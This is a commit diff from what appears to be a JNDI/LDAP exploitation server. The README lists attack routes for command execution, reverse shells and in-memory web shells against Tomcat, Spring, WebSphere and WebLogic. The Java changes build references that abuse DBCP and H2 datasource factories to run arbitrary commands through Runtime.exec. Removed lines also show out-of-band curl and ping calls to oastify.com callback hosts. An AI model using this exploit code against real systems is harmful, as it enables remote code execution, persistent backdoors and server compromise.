fix issues

Author: shadowsock5

README.md

@@ -49,29 +49,32 @@ Supported LADP Queries
     ldap://127.0.0.1:1389/Deserialization/CVE_2020_2555/WeblogicMemshell1
     ldap://127.0.0.1:1389/Deserialization/CVE_2020_2883/WeblogicMemshell2    ---ALSO support other memshells
 
-[+] TomcatBypass Queries
-    ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain]
-    ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd]
-    ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]
-    ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port]  ---windows NOT supported
-    ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho
-    ldap://127.0.0.1:1389/TomcatBypass/SpringEcho
-    ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell1
-    ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell2   ---need extra header [Shell: true]
-    ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell
-
-[+] GroovyBypass Queries
-    ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd]
-    ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]
-
-[+] WebsphereBypass Queries
-    ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory]
-    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain]
-    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd]
-    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]
-    ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port]  ---windows NOT supported
-    ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell
-    ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path]   ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp
+[+] tomcatelbypass(javax.script.ScriptEngineManager), 2tomcatelbypass(jdk.jshell.JShell) Queries
+    ldap://127.0.0.1:1389/tomcatelbypass/Dnslog/[domain]
+    ldap://127.0.0.1:1389/tomcatelbypass/Command/[cmd]
+    ldap://127.0.0.1:1389/tomcatelbypass/Command/Base64/[base64_encoded_cmd]
+    ldap://127.0.0.1:1389/tomcatelbypass/ReverseShell/[ip]/[port]
+    ldap://127.0.0.1:1389/tomcatelbypass/TomcatEcho
+    ldap://127.0.0.1:1389/tomcatelbypass/SpringEcho
+    ldap://127.0.0.1:1389/tomcatelbypass/TomcatMemshell1
+    ldap://127.0.0.1:1389/tomcatelbypass/TomcatMemshell2
+    ldap://127.0.0.1:1389/tomcatelbypass/SpringMemshell
+
+cmd: ls -al
+Testecho: whatever
+
+
+[+] commonsconfiguration2(org.apache.commons.configuration2.SystemConfiguration) Queries
+    ldap://127.0.0.1:1389/commonsconfiguration2/url/base64/[base64encoded url]
+
+[+] tomcatsnakeyaml Queries
+    ldap://127.0.0.1:1389/tomcatsnakeyaml/url/base64/[base64encoded url]
+
+
+[+] tomcatgroovybypass Queries
+    ldap://127.0.0.1:1389/tomcatgroovybypass/Command/[cmd]
+    ldap://127.0.0.1:1389/tomcatgroovybypass/Command/Base64/[base64_encoded_cmd]
+
 ```
 * 目前支持的所有 ```PayloadType``` 为
   * ```Dnslog```: 用于产生一个```DNS```请求，与 ```DNSLog```平台配合使用，对```Linux/Windows```进行了简单的适配

src/main/java/com/feihong/ldap/controllers/DbcpController.java

@@ -79,10 +79,12 @@ private static Reference commons_dbcp1_RCE(){
 
 
     private static Reference dbcpByFactory(String factory){
+        String cmd = "calc";  // 修改这里
+
         Reference ref = new Reference("javax.sql.DataSource",factory,null);
         String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
                 "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
-                "java.lang.Runtime.getRuntime().exec('curl xxxxxxxx.oastify.com/h2_dbcp_jndibypass')\n" +
+                "java.lang.Runtime.getRuntime().exec('" + cmd +  "')\n" +
                 "$$\n";
         ref.add(new StringRefAddr("driverClassName","org.h2.Driver"));
         ref.add(new StringRefAddr("url",JDBC_URL));

src/main/java/com/feihong/ldap/controllers/H2BasicDataSourceFactoryController.java

@@ -1,5 +1,6 @@
 package com.feihong.ldap.controllers;
 
+import com.feihong.ldap.enumtypes.PayloadType;
 import com.feihong.ldap.exceptions.IncorrectParamsException;
 import com.feihong.ldap.exceptions.UnSupportedPayloadTypeException;
 import com.feihong.ldap.template.SpringMemshellTemplate;
@@ -23,14 +24,17 @@
 @LdapMapping(uri = { "/h2bdsfc" })
 public class H2BasicDataSourceFactoryController implements LdapController {
 
+    private PayloadType type;
+    private String[] params;
+
     @Override
     public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {
         System.out.println("[+] Sending LDAP ResourceRef result for " + base);
 
         Entry e = new Entry(base);
         e.addAttribute("javaClassName", "java.lang.String"); //could be any
         //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
-        javax.naming.Reference ref = tomcat_dbcp1_RCE();
+        javax.naming.Reference ref = tomcat_dbcp1_RCE(params[0]);
 
         e.addAttribute("javaSerializedData", Util.serialize(ref));
 
@@ -42,26 +46,48 @@ public void sendResult(InMemoryInterceptedSearchResult result, String base) thro
 
     @Override
     public void process(String base) throws UnSupportedPayloadTypeException, IncorrectParamsException {
+        try{
+            int firstIndex = base.indexOf("/");
+            int secondIndex = base.indexOf("/", firstIndex + 1);
+            if(secondIndex < 0) secondIndex = base.length();
+
+            //因为我对 grovvy 的语法完全不懂，所以目前只支持执行命令这一种形式的 PayloadType
+            String payloadType = base.substring(firstIndex + 1, secondIndex);
+            if(payloadType.equalsIgnoreCase("command")){
+                type = PayloadType.valueOf("command");
+                System.out.println("[+] Paylaod: " + type);
+            }else{
+                throw new UnSupportedPayloadTypeException("UnSupportedPayloadType: " + payloadType);
+            }
+
+            String cmd = Util.getCmdFromBase(base);
+            System.out.println("[+] Command: " + cmd);
+            params = new String[]{cmd};
+        }catch(Exception e){
+            if(e instanceof UnSupportedPayloadTypeException) throw (UnSupportedPayloadTypeException)e;
+
+            throw new IncorrectParamsException("Incorrect params: " + base);
+        }
     }
 
 
-    private static Reference tomcat_dbcp2_RCE(){
-        return dbcpByFactory("org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory");
+    private static Reference tomcat_dbcp2_RCE(String cmd){
+        return dbcpByFactory("org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory", cmd);
     }
-    private static Reference tomcat_dbcp1_RCE(){
-        return dbcpByFactory("org.apache.tomcat.dbcp.dbcp.BasicDataSourceFactory");
+    private static Reference tomcat_dbcp1_RCE(String cmd){
+        return dbcpByFactory("org.apache.tomcat.dbcp.dbcp.BasicDataSourceFactory", cmd);
     }
-    private static Reference commons_dbcp2_RCE(){
-        return dbcpByFactory("org.apache.commons.dbcp2.BasicDataSourceFactory");
+    private static Reference commons_dbcp2_RCE(String cmd){
+        return dbcpByFactory("org.apache.commons.dbcp2.BasicDataSourceFactory", cmd);
     }
-    private static Reference commons_dbcp1_RCE(){
-        return dbcpByFactory("org.apache.commons.dbcp.BasicDataSourceFactory");
+    private static Reference commons_dbcp1_RCE(String cmd){
+        return dbcpByFactory("org.apache.commons.dbcp.BasicDataSourceFactory", cmd);
     }
-    private static Reference dbcpByFactory(String factory){
+    private static Reference dbcpByFactory(String factory, String cmd){
         Reference ref = new Reference("javax.sql.DataSource",factory,null);
         String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
                 "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
-                "java.lang.Runtime.getRuntime().exec('ping basicdatasourcefatory.xxx.oastify.com')\n" +
+                "java.lang.Runtime.getRuntime().exec('" + cmd +  "')\n" +
                 "$$\n";
         ref.add(new StringRefAddr("driverClassName","org.h2.Driver"));
         ref.add(new StringRefAddr("url",JDBC_URL));

src/main/java/com/feihong/ldap/controllers/H2ClassPathXmlApplicationContext.java

@@ -112,7 +112,7 @@ public void process(String base) throws UnSupportedPayloadTypeException, Incorre
             switch (type){
                 case url:
                     String url = Util.getUrlFromBase(base);
-                    System.out.println("[+] XXE xml url: " + url);
+                    System.out.println("[+] Spring xml url: " + url);
                     params = new String[]{url};    // 设置好url，待sendResult方法内使用
                     break;
             }

src/main/java/com/feihong/ldap/controllers/SerializedDataController2.java

@@ -20,6 +20,7 @@
  */
 
 @LdapMapping(uri = { "/2tomcatelbypass" })
+// JDK > 15, using jdk.jshell.JShell
 public class TomcatELBypass2Controller implements LdapController {
     private PayloadType type;
     private String[] params;

src/main/java/com/feihong/ldap/controllers/SerializedDataController3.java

@@ -21,6 +21,7 @@
  */
 
 @LdapMapping(uri = { "/tomcatelbypass" })
+// JDK < 15, using javax.script.ScriptEngineManager
 public class TomcatELBypassController implements LdapController {
     private PayloadType type;
     private String[] params;